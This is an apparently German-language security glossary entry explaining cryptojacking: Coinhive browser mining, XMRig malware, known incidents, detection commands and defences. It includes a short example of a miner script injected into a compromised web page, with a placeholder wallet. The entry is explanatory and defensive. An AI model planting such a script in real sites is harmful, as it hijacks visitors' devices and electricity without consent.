Cryptojacking
Missbrauch fremder Rechenleistung für Kryptowährungs-Mining ohne Wissen des Eigentümers. Oft durch Browser-Skripte oder Malware - erkennbar an unerwartetem CPU-Anstieg. Verursacht hohe Energiekosten und Systemabnutzung.
Cryptojacking bezeichnet den unbefugten Einsatz fremder Rechenressourcen für das Mining von Kryptowährungen (meist Monero, da CPU-freundlich und anonym). Angreifer benötigen keine eigene Infrastruktur - sie “stehlen” einfach die Rechenleistung von Millionen infizierter Geräte.
Wie Cryptojacking funktioniert
Browser-basiertes Cryptojacking
Der Klassiker war Coinhive (2017-2019): JavaScript-Bibliothek die im Browser Monero schürfte - manchmal mit Wissen des Seitenbesitzers als “Alternative zu Werbung”, häufig ohne.
<!-- Bösartiges Script in kompromittierter Webseite -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('wallet-address');
miner.start();
</script>Besucher der Webseite: CPU-Auslastung springt auf 90%+, Lüfter läuft.
Heute: Coinhive ist down, aber Nachfolger existieren. Browser-Mining ist weniger populär wegen Browser-Blockierung und besserer AV-Erkennung.
Malware-basiertes Cryptojacking
Malware wie XMRig wird auf kompromittierten Systemen installiert:
- Infektionsvektor: Ungepatchte Server, Phishing, Supply Chain
- XMRig (Monero Miner) wird als Service installiert
- Läuft 24/7 mit gedrosselter CPU (70-80% statt 100% - um nicht aufzufallen)
- Mined Monero und sendet an Angreifer-Wallet
Bekannte Fälle:
- Tesla (2018): Kubernetes-Admin-Console offen zugänglich → Cryptominer installiert
- WannaMine (2018): Nutzte EternalBlue (NSA-Exploit) für Verbreitung → Monero-Mining
- Prometei Botnet: Kompromittiert Exchange-Server über ProxyLogon
Erkennung
Symptome:
- Unerwarteter, dauerhafter CPU-Anstieg (> 70-80% ohne bekannte Last)
- Erhöhte Energiekosten
- Überhitzung von Systemen
- Langsamere Anwendungen
Technische Erkennung:
# Linux: Prozesse mit hoher CPU prüfen
top -o %CPU
ps aux --sort=-%cpu | head -20
# Netzwerkverbindungen zu bekannten Mining-Pools
ss -tulnp | grep -E "3333|4444|5555|14444|7777"
# Mining-Pool Ports: oft 3333, 4444, 14444
# Unbekannte geplante Tasks
crontab -l
systemctl list-units --type=service --state=runningIn Unternehmensumgebungen:
- SIEM-Regel: CPU > 90% für > 30 Minuten auf Server
- DNS-Monitoring: Anfragen zu bekannten Mining-Pool-Domains
- EDR erkennt XMRig und ähnliche Tools
Auswirkungen auf Unternehmen
- Energiekosten: Server der Cryptominer ausführt verbraucht 200-300% mehr Strom
- Hardware-Abnutzung: Dauerhafte Vollast beschleunigt Alterung von CPUs
- Performance-Degradierung: Kritische Anwendungen sind verlangsamt
- Indikator für größeren Breach: Cryptojacking zeigt dass Angreifer Zugang haben - oft nur “harmlose” Nutzung, bis Ransomware profitable erscheint
Schutz
- Patching: EternalBlue, ProxyLogon, Log4Shell waren Haupteinfallstore
- EDR: Verhaltensbasierte Erkennung von Mining-Prozessen
- Browser-Erweiterungen: MinerBlock, NoCoin für Browser-Mining
- DNS-Filterung: Bekannte Mining-Pool-Domains blockieren
- Kubernetes-Härtung: Admin-Konsolen nicht öffentlich zugänglich
- Network Monitoring: Anomale ausgehende Verbindungen zu Pool-Ports
